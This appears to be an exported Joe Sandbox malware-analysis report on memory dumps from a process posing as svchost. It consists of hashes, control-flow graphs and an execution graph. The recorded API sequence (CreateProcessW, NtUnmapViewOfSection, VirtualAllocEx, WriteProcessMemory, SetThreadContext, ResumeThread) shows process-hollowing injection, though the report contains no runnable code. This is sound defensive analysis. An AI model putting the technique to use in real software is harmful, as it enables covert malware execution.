                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 80964df6b66241a8205d0d4e53af5d2c508e323b7e58a11dada4a2bea6f78e78
                                                                                                                                                                                      • Instruction ID: 320cc8f4a921dadcbc43b4cfa70ecad95e7e3259b819db5d6de6065ea54a7081
                                                                                                                                                                                      • Opcode Fuzzy Hash: 80964df6b66241a8205d0d4e53af5d2c508e323b7e58a11dada4a2bea6f78e78
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F028C2F0CD4F0AF7B8582DA9551759AC5DFC511172802FFD0C9C12C5DE099C428280
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 47f2a9aa9d5ae308916c11dc29fef40d9056de25c680c3189af09ffd3a4505f0
                                                                                                                                                                                      • Instruction ID: c8e521f8698ff3049a9eb6cb479dd3b718aa69ada482b5d2edf8659f9fd74d01
                                                                                                                                                                                      • Opcode Fuzzy Hash: 47f2a9aa9d5ae308916c11dc29fef40d9056de25c680c3189af09ffd3a4505f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2701F5A2A0C9424BD31CFE7C89770B9B2ADDB54720B2983BDD84BC73E2EC08980241C5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ef73acf55578f6fc4b49fc4e67f479a53e807da9076c8ecb20e7460925010302
                                                                                                                                                                                      • Instruction ID: a969ea7bbe872de04aabb6a960082015d6fdb24f8857209966f04c60f6bc3f7b
                                                                                                                                                                                      • Opcode Fuzzy Hash: ef73acf55578f6fc4b49fc4e67f479a53e807da9076c8ecb20e7460925010302
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E01D4A2B0C9460BD31CED7C89771B9729AD755610B2943BDDC4BC73E2EC04980202C5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 06f5b5433d37b7964c7310e975597344163a1a25741632ad8666e826d046e1c3
                                                                                                                                                                                      • Instruction ID: 2536e03c7baad2ae5c7bb806fce0484e2b380369ccb583810c4a731fc6fb20a7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 06f5b5433d37b7964c7310e975597344163a1a25741632ad8666e826d046e1c3
                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF0FC7151CE894FD7A6EB3CC895561B7F1EF6531030A02FAC4CAC75A6DE18E8478340
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3485069817e8d772b0541969b6f3e10543c4432b15c1102ab55b6769e09daa4d
                                                                                                                                                                                      • Instruction ID: 967bc563129561dd58f80c45872acd44ce669cdacff1a8b936774e61fe60580b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3485069817e8d772b0541969b6f3e10543c4432b15c1102ab55b6769e09daa4d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101FF7570C8064BDB1CFD7C9A67179719BD789310B2182BEEA5BCB3E6ED28D81202C4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 67f54dcd775ea4220a5ffc05d02715967de0b40174ad8eabe5aa18393b5adf25
                                                                                                                                                                                      • Instruction ID: 79c315fb1d9f7d222e951c45804c41d9ef126c2d4b2360641e37c50ea5384041
                                                                                                                                                                                      • Opcode Fuzzy Hash: 67f54dcd775ea4220a5ffc05d02715967de0b40174ad8eabe5aa18393b5adf25
                                                                                                                                                                                      • Instruction Fuzzy Hash: CBE04F9184F6D10FDB136B7649B6095BF908E0721035C44FEC4C48F197E41E644BC702
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ca685495c2234a21265e0888d3939aa5c2c05f141baa73984a622f13b8dc66b1
                                                                                                                                                                                      • Instruction ID: 78da3ec443f63c725a118b3457a90e57f782ce35b5fe762593f21e76f36da93f
                                                                                                                                                                                      • Opcode Fuzzy Hash: ca685495c2234a21265e0888d3939aa5c2c05f141baa73984a622f13b8dc66b1
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1C01230516A0D8BC7197B34D542054B151AF49204BD014BCD40DC92D2DE3F9882C700
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                                      • API String ID: 0-1397233021
                                                                                                                                                                                      • Opcode ID: 814f3c9cc0f2d3d3f4a1d1d84e1793b39fd99e1be41fccb94b2d1b85c97deb60
                                                                                                                                                                                      • Instruction ID: 64f917f086a1d752f085f233e5ccdef581774ded947b09f95456d1f22f85fbce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 814f3c9cc0f2d3d3f4a1d1d84e1793b39fd99e1be41fccb94b2d1b85c97deb60
                                                                                                                                                                                      • Instruction Fuzzy Hash: B721A6E390868987EB076E6D9CA60ED7BD4EF2129CB9903F5D898CB1C3FD2424064585
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:11.4%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:30
                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                      execution_graph 14346 7ffb4af9edf5 14347 7ffb4af9ee03 Wow64SetThreadContext 14346->14347 14349 7ffb4af9ee9a 14347->14349 14354 7ffb4af9cb08 14355 7ffb4af9cb11 14354->14355 14358 7ffb4af9c9a8 14355->14358 14357 7ffb4af9cd6f 14359 7ffb4af9c9ad 14358->14359 14360 7ffb4af9cb54 VirtualAllocEx 14359->14360 14361 7ffb4af9cadb NtUnmapViewOfSection 14359->14361 14366 7ffb4af9cb18 14359->14366 14365 7ffb4af9e7e6 14360->14365 14363 7ffb4af9e48a 14361->14363 14363->14357 14365->14357 14366->14357 14367 7ffb4af8090d 14368 7ffb4af8091f FreeConsole 14367->14368 14370 7ffb4af8099e 14368->14370 14337 7ffb4af9f25a 14339 7ffb4af9f267 14337->14339 14338 7ffb4af9f22d 14339->14338 14340 7ffb4af9f2cd ResumeThread 14339->14340 14341 7ffb4af9f304 14340->14341 14325 7ffb4af9e1b9 14326 7ffb4af9e1c5 CreateProcessW 14325->14326 14328 7ffb4af9e2f2 14326->14328 14329 7ffb4af8303a 14330 7ffb4af83049 VirtualProtect 14329->14330 14332 7ffb4af83121 14330->14332 14333 7ffb4af9e92d 14334 7ffb4af9e94f WriteProcessMemory 14333->14334 14336 7ffb4af9ea01 14334->14336

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 7ffb4af9c9a8-7ffb4af9c9d9 6 7ffb4af9ca55-7ffb4af9ca62 0->6 7 7ffb4af9c9db-7ffb4af9ca22 0->7 8 7ffb4af9ca64-7ffb4af9ca6e 6->8 9 7ffb4af9cab0-7ffb4af9cac9 6->9 14 7ffb4af9ca70-7ffb4af9caaf 7->14 26 7ffb4af9ca24-7ffb4af9ca41 7->26 8->14 22 7ffb4af9cb18-7ffb4af9cd7d call 7ffb4af9c9a8 9->22 23 7ffb4af9cacc-7ffb4af9cad9 9->23 14->9 66 7ffb4af9cdd6-7ffb4af9cdeb 22->66 67 7ffb4af9cdf0 22->67 27 7ffb4af9cb54-7ffb4af9e7e4 VirtualAllocEx 23->27 28 7ffb4af9cadb-7ffb4af9e488 NtUnmapViewOfSection 23->28 26->6 55 7ffb4af9e7e6 27->55 56 7ffb4af9e7ec-7ffb4af9e809 27->56 48 7ffb4af9e48a 28->48 49 7ffb4af9e490-7ffb4af9e4ac 28->49 48->49 55->56 66->67 69 7ffb4af9ce1e-7ffb4af9ceb8 66->69 67->66 67->69 75 7ffb4af9cfe8-7ffb4af9cffa 69->75 76 7ffb4af9cebe-7ffb4af9cee3 69->76 80 7ffb4af9d1ba-7ffb4af9d1d7 75->80 81 7ffb4af9d000-7ffb4af9d016 75->81 76->75 83 7ffb4af9cee9-7ffb4af9cefd 76->83 81->80 89 7ffb4af9d01c-7ffb4af9d030 81->89 83->75 87 7ffb4af9d1d8-7ffb4af9d290 83->87 95 7ffb4af9d29c-7ffb4af9d2d3 87->95 89->80 97 7ffb4af9d4c4-7ffb4af9d4d9 95->97 98 7ffb4af9d2d9-7ffb4af9d405 95->98 102 7ffb4af9d4e3-7ffb4af9d4ef 97->102 103 7ffb4af9d4db-7ffb4af9d4e2 97->103 98->97 106 7ffb4af9d40b-7ffb4af9d426 98->106 103->102 106->97 107 7ffb4af9d42c-7ffb4af9d43f 106->107 107->97 108 7ffb4af9d445-7ffb4af9d456 107->108 108->97 110 7ffb4af9d458-7ffb4af9d467 108->110 111 7ffb4af9d469-7ffb4af9d474 110->111 112 7ffb4af9d4b2-7ffb4af9d4c3 110->112 111->112 114 7ffb4af9d476-7ffb4af9d4ad call 7ffb4af9a380 111->114 114->112
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: }L_
                                                                                                                                                                                      • API String ID: 0-2082537435
                                                                                                                                                                                      • Opcode ID: cc416d55c877e87bff6d054ad688c373df8f67a16e5cc7b6fdcfa089491fc603
                                                                                                                                                                                      • Instruction ID: 602b712462ebe9c8b99caa560ee49c295c8b525a7c95e4c4096a0321dcb34b93
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc416d55c877e87bff6d054ad688c373df8f67a16e5cc7b6fdcfa089491fc603
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1B137F290C6558FE715FF6CE8961F97BA8EF52321F1442BBD089C3193E924640787A1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 974 7ffb4af9ca47-7ffb4af9ca49 975 7ffb4af9cac5-7ffb4af9cac9 974->975 976 7ffb4af9ca4b-7ffb4af9ca62 974->976 978 7ffb4af9cb18-7ffb4af9cd7d call 7ffb4af9c9a8 975->978 979 7ffb4af9cacc-7ffb4af9cad9 975->979 981 7ffb4af9ca64-7ffb4af9caaf 976->981 982 7ffb4af9cab0-7ffb4af9cabe 976->982 1027 7ffb4af9cdd6-7ffb4af9cdeb 978->1027 1028 7ffb4af9cdf0 978->1028 983 7ffb4af9cb54-7ffb4af9e7e4 VirtualAllocEx 979->983 984 7ffb4af9cadb-7ffb4af9e488 NtUnmapViewOfSection 979->984 981->982 982->975 1016 7ffb4af9e7e6 983->1016 1017 7ffb4af9e7ec-7ffb4af9e809 983->1017 1006 7ffb4af9e48a 984->1006 1007 7ffb4af9e490-7ffb4af9e4ac 984->1007 1006->1007 1016->1017 1027->1028 1030 7ffb4af9ce1e-7ffb4af9ceb8 1027->1030 1028->1027 1028->1030 1036 7ffb4af9cfe8-7ffb4af9cffa 1030->1036 1037 7ffb4af9cebe-7ffb4af9cee3 1030->1037 1041 7ffb4af9d1ba-7ffb4af9d1d7 1036->1041 1042 7ffb4af9d000-7ffb4af9d016 1036->1042 1037->1036 1044 7ffb4af9cee9-7ffb4af9cefd 1037->1044 1042->1041 1050 7ffb4af9d01c-7ffb4af9d030 1042->1050 1044->1036 1048 7ffb4af9d1d8-7ffb4af9d2d3 1044->1048 1058 7ffb4af9d4c4-7ffb4af9d4d9 1048->1058 1059 7ffb4af9d2d9-7ffb4af9d405 1048->1059 1050->1041 1063 7ffb4af9d4e3-7ffb4af9d4ef 1058->1063 1064 7ffb4af9d4db-7ffb4af9d4e2 1058->1064 1059->1058 1067 7ffb4af9d40b-7ffb4af9d426 1059->1067 1064->1063 1067->1058 1068 7ffb4af9d42c-7ffb4af9d43f 1067->1068 1068->1058 1069 7ffb4af9d445-7ffb4af9d456 1068->1069 1069->1058 1071 7ffb4af9d458-7ffb4af9d467 1069->1071 1072 7ffb4af9d469-7ffb4af9d474 1071->1072 1073 7ffb4af9d4b2-7ffb4af9d4c3 1071->1073 1072->1073 1075 7ffb4af9d476-7ffb4af9d4ad call 7ffb4af9a380 1072->1075 1075->1073
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                                                      • Opcode ID: 5ff3e8add1952f39c230e0f4012ab61a5a7b5104b57b4dbe0ab8312efba3fbb6
                                                                                                                                                                                      • Instruction ID: 00bd2e39e454cb971e1a754d7c111ed43283a06f1da5567b4cabb31f5f361ed3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ff3e8add1952f39c230e0f4012ab61a5a7b5104b57b4dbe0ab8312efba3fbb6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 93414BF2A0C2598FDB15EF6CE8A62EA7BE8EF41320F1441BBD049C7143E93464478791
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1160 7ffb4af9ca83-7ffb4af9cac9 1169 7ffb4af9cb18-7ffb4af9cd7d call 7ffb4af9c9a8 1160->1169 1170 7ffb4af9cacc-7ffb4af9cad9 1160->1170 1207 7ffb4af9cdd6-7ffb4af9cdeb 1169->1207 1208 7ffb4af9cdf0 1169->1208 1172 7ffb4af9cb54-7ffb4af9e7e4 VirtualAllocEx 1170->1172 1173 7ffb4af9cadb-7ffb4af9e488 NtUnmapViewOfSection 1170->1173 1196 7ffb4af9e7e6 1172->1196 1197 7ffb4af9e7ec-7ffb4af9e809 1172->1197 1189 7ffb4af9e48a 1173->1189 1190 7ffb4af9e490-7ffb4af9e4ac 1173->1190 1189->1190 1196->1197 1207->1208 1210 7ffb4af9ce1e-7ffb4af9ceb8 1207->1210 1208->1207 1208->1210 1216 7ffb4af9cfe8-7ffb4af9cffa 1210->1216 1217 7ffb4af9cebe-7ffb4af9cee3 1210->1217 1221 7ffb4af9d1ba-7ffb4af9d1d7 1216->1221 1222 7ffb4af9d000-7ffb4af9d016 1216->1222 1217->1216 1224 7ffb4af9cee9-7ffb4af9cefd 1217->1224 1222->1221 1230 7ffb4af9d01c-7ffb4af9d030 1222->1230 1224->1216 1228 7ffb4af9d1d8-7ffb4af9d2d3 1224->1228 1238 7ffb4af9d4c4-7ffb4af9d4d9 1228->1238 1239 7ffb4af9d2d9-7ffb4af9d405 1228->1239 1230->1221 1243 7ffb4af9d4e3-7ffb4af9d4ef 1238->1243 1244 7ffb4af9d4db-7ffb4af9d4e2 1238->1244 1239->1238 1247 7ffb4af9d40b-7ffb4af9d426 1239->1247 1244->1243 1247->1238 1248 7ffb4af9d42c-7ffb4af9d43f 1247->1248 1248->1238 1249 7ffb4af9d445-7ffb4af9d456 1248->1249 1249->1238 1251 7ffb4af9d458-7ffb4af9d467 1249->1251 1252 7ffb4af9d469-7ffb4af9d474 1251->1252 1253 7ffb4af9d4b2-7ffb4af9d4c3 1251->1253 1252->1253 1255 7ffb4af9d476-7ffb4af9d4ad call 7ffb4af9a380 1252->1255 1255->1253
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7901a7142ca0a05b97a27b232665c2783bb5cc6290ab8070a3f4bc9fb0614022
                                                                                                                                                                                      • Instruction ID: f77d9daee0da5db1d98cb154fc0e2994fdacb3e2996f08e7c92fced6f889b107
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7901a7142ca0a05b97a27b232665c2783bb5cc6290ab8070a3f4bc9fb0614022
                                                                                                                                                                                      • Instruction Fuzzy Hash: AD4137B2A0C6498FEB54EF6CD8966E97BE4EF55320F0441BBD049C7143EA34A8078790
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                                                      • Opcode ID: 1a6f52f4178e020aa46e93d7b7969e85a5e7b0643c9586950e3e97dcabe22380
                                                                                                                                                                                      • Instruction ID: 5a59ca5b8271820ac20edf2a957f606ed509bfd7bb92fb4b21dd923e904ba253
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a6f52f4178e020aa46e93d7b7969e85a5e7b0643c9586950e3e97dcabe22380
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0521D27190CA4C8FDB58DF6CD88A7E9BBF4EB56320F0441AFD049C3252CA70A456CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: WL_H
                                                                                                                                                                                      • API String ID: 4275171209-1262097562
                                                                                                                                                                                      • Opcode ID: 03f0d5d79501d211fee9551095ac120d9bc0bd576cd9d1b9b566bff4d193e801
                                                                                                                                                                                      • Instruction ID: b2a5d38cbd5dba87d68bdeb0320d6e97154d54a645c90e55a2d778db8aaca94d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03f0d5d79501d211fee9551095ac120d9bc0bd576cd9d1b9b566bff4d193e801
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9571797190CB498FE719EF38D8965E5BBF4FF95310F1401BED08AC3292DA24A846C782
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 553 7ffb4b06026b-7ffb4b06026d 554 7ffb4b0603b1-7ffb4b0603b7 553->554 555 7ffb4b06026e-7ffb4b06027c 553->555 558 7ffb4b0603b9-7ffb4b0603c8 554->558 557 7ffb4b060284-7ffb4b060286 555->557 559 7ffb4b060288-7ffb4b060289 557->559 560 7ffb4b0602f7-7ffb4b060306 557->560 564 7ffb4b0603c9-7ffb4b060427 558->564 561 7ffb4b06024f-7ffb4b06026a 559->561 562 7ffb4b06028b 559->562 563 7ffb4b060307-7ffb4b060309 560->563 561->553 562->563 565 7ffb4b06028d 562->565 563->554 566 7ffb4b06030a-7ffb4b060348 563->566 576 7ffb4b06045c-7ffb4b060474 564->576 577 7ffb4b060429-7ffb4b060440 564->577 568 7ffb4b06028f-7ffb4b0602a0 565->568 569 7ffb4b0602d4 565->569 566->558 592 7ffb4b06034a-7ffb4b06034d 566->592 580 7ffb4b0602a2-7ffb4b0602b8 568->580 581 7ffb4b060234-7ffb4b06023b 568->581 569->554 573 7ffb4b0602da-7ffb4b0602f5 569->573 573->560 578 7ffb4b060442-7ffb4b06045a 577->578 579 7ffb4b0604b1-7ffb4b0604d0 577->579 578->576 586 7ffb4b0604d1-7ffb4b060500 578->586 579->586 580->554 585 7ffb4b0602be-7ffb4b0602d1 580->585 581->554 587 7ffb4b060241-7ffb4b06024e 581->587 585->569 596 7ffb4b060502-7ffb4b060534 586->596 597 7ffb4b060571-7ffb4b060590 586->597 587->561 592->564 595 7ffb4b06034f 592->595 598 7ffb4b060351-7ffb4b06035f 595->598 599 7ffb4b060396-7ffb4b0603b0 595->599 603 7ffb4b060592-7ffb4b060595 597->603 604 7ffb4b060597-7ffb4b0605a7 597->604 598->599 603->604 607 7ffb4b0605dc-7ffb4b0605f4 604->607 608 7ffb4b0605a9-7ffb4b0605c0 604->608 610 7ffb4b0605c2-7ffb4b0605da 608->610 611 7ffb4b060631-7ffb4b060668 608->611 610->607 617 7ffb4b06069d-7ffb4b0606a8 611->617 618 7ffb4b06066a-7ffb4b06067a 611->618 622 7ffb4b0606bc-7ffb4b0606c5 617->622 623 7ffb4b0606aa-7ffb4b0606b9 617->623 620 7ffb4b06067c-7ffb4b06067e 618->620 621 7ffb4b0606eb-7ffb4b0606f9 618->621 625 7ffb4b060680 620->625 626 7ffb4b0606fa-7ffb4b06073c 620->626 621->626 628 7ffb4b0606c6-7ffb4b0606c7 622->628 623->622 625->628 630 7ffb4b060682-7ffb4b06069c 625->630 633 7ffb4b06073e-7ffb4b060772 626->633 634 7ffb4b060786-7ffb4b06078b 626->634 630->617 635 7ffb4b060a42-7ffb4b060a4a 633->635 636 7ffb4b060778-7ffb4b060781 633->636 634->635 637 7ffb4b06078c-7ffb4b06079e 634->637 643 7ffb4b060a4f-7ffb4b060a56 635->643 639 7ffb4b060784-7ffb4b060785 636->639 638 7ffb4b06079f-7ffb4b0607bd 637->638 638->635 642 7ffb4b0607c3-7ffb4b0607d6 638->642 639->634 646 7ffb4b0607d8-7ffb4b0607d9 642->646 647 7ffb4b060847-7ffb4b060856 642->647 644 7ffb4b060a57-7ffb4b060a72 643->644 644->643 646->638 649 7ffb4b0607db 646->649 648 7ffb4b060857-7ffb4b060859 647->648 648->635 650 7ffb4b06085a-7ffb4b060872 648->650 649->648 651 7ffb4b0607dd 649->651 657 7ffb4b060874-7ffb4b060877 650->657 658 7ffb4b0608e3-7ffb4b0608f0 650->658 652 7ffb4b0607df-7ffb4b0607f0 651->652 653 7ffb4b060824 651->653 652->639 659 7ffb4b0607f2-7ffb4b060808 652->659 653->635 656 7ffb4b06082a-7ffb4b060845 653->656 656->647 661 7ffb4b060879 657->661 662 7ffb4b0608f3 657->662 658->662 659->635 663 7ffb4b06080e-7ffb4b060821 659->663 666 7ffb4b0608c0 661->666 667 7ffb4b06087b-7ffb4b0608a2 661->667 662->635 665 7ffb4b0608f9-7ffb4b06090c 662->665 663->653 674 7ffb4b06090e-7ffb4b060912 665->674 675 7ffb4b06097d-7ffb4b060990 665->675 669 7ffb4b0608c2 666->669 670 7ffb4b0608c3-7ffb4b0608e1 666->670 667->635 672 7ffb4b0608a8-7ffb4b0608be 667->672 669->670 670->658 672->635 672->666 676 7ffb4b060914 674->676 677 7ffb4b060993 674->677 675->677 678 7ffb4b060974-7ffb4b06097b 676->678 677->635 679 7ffb4b060999-7ffb4b0609b5 677->679 678->675 682 7ffb4b0609d2-7ffb4b0609e6 679->682 683 7ffb4b0609b7-7ffb4b0609cc 679->683 682->644 684 7ffb4b0609e8-7ffb4b0609ed 682->684 683->682 684->678 686 7ffb4b0609ef 684->686 686->635
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1924090376.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4b060000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                      • API String ID: 0-3554254475
                                                                                                                                                                                      • Opcode ID: 74a726394f91e04ebcdcd5e9a9248c8fceb483cd9951dee483101d0059dd7db3
                                                                                                                                                                                      • Instruction ID: 7dea1ba0b1595c2df2e35671be136407dc27759dadf09d80ce63864ad5419713
                                                                                                                                                                                      • Opcode Fuzzy Hash: 74a726394f91e04ebcdcd5e9a9248c8fceb483cd9951dee483101d0059dd7db3
